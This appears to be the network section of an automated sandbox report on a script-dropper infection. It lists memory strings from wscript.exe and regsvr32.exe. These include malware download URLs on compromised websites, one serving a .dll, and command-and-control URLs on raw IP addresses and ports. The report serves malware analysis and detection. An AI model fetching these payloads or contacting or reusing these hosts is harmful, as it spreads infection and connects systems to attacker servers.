              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
              Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
              Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: wscript.exe, 00000009.00000003.352083171.000000000543B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349954279.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.354073376.000000000543C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351723775.0000000005423000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.424429920.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480859658.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.420606431.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: regsvr32.exe, 0000000C.00000003.417229525.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/U
              Source: regsvr32.exe, 0000000C.00000003.423585505.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: regsvr32.exe, 0000000C.00000003.424429920.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480859658.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.420606431.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.12.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: regsvr32.exe, 0000000C.00000003.417229525.0000000001350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?8018d46f033f9
              Source: regsvr32.exe, 0000000C.00000003.424429920.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480859658.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.420606431.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabn
              Source: wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/
              Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/xM
              Source: wscript.exe, 00000009.00000003.347973913.000000000529E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348372206.00000000052DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348646615.0000000005321000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348586602.00000000052F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348295456.00000000052AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351610411.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.353640909.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348732137.0000000005328000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348458187.00000000052EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348118755.00000000052A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxW
              Source: wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
              Source: wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.346224913.0000000005175000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345755235.0000000005160000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/7
              Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
              Source: wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
              Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
              Source: regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/
              Source: regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/I
              Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
              Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/h
              Source: regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/
              Source: regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
              Source: regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl//6(
              Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/3
              Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
              Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/
              Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/8
              Source: regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/l
              Source: regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/mwollpl/
              Source: regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
              Source: regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/#
              Source: regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/IT
              Source: regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/eB
              Source: regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/n
              Source: regsvr32.exe, 0000000C.00000003.451389170.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/
              Source: regsvr32.exe, 0000000C.00000003.451389170.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
              Source: regsvr32.exe, 0000000C.00000003.451113819.00000000012E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/l/
              Source: regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/x
              Source: regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.172.199.165:8080/
              Source: regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/01
              Source: regsvr32.exe, 0000000C.00000003.451389170.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
              Source: regsvr32.exe, 0000000C.00000003.451389170.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.000000000133A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/_
              Source: regsvr32.exe, 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/
              Source: regsvr32.exe, 0000000C.00000003.421394475.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480911858.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
              Source: regsvr32.exe, 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/000
              Source: wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.000000000512D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
              Source: wscript.exe, 00000009.00000003.349639269.000000000538E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349867697.0000000005396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll
              Source: wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349438794.0000000005384000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349093361.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349339319.000000000537A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllNZr
              Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
              Source: regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pe2.162.143.56/
              Source: wscript.exe, 00000009.00000003.349954279.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.350000568.000000000540A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.354012857.000000000540A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351723775.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.354073376.0000000005423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/
              Source: wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.350249586.0000000004B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.350180272.0000000004B29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345037298.000000000510B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345791230.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343112035.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337309001.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
              Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
              Source: wscript.exe, 00000009.00000003.347225816.00000000050AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFb
              Source: wscript.exe, 00000009.00000003.347973913.000000000529E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348372206.00000000052DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348646615.0000000005321000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348586602.00000000052F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348295456.00000000052AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351610411.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.353640909.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348732137.0000000005328000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348458187.00000000052EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348118755.00000000052A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1j
              Source: wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.000000000512D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345037298.000000000510B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345791230.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343112035.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337309001.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349571912.00000000053A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343189350.0000000004FAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347462886.00000000051C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343401747.0000000005065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
              Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
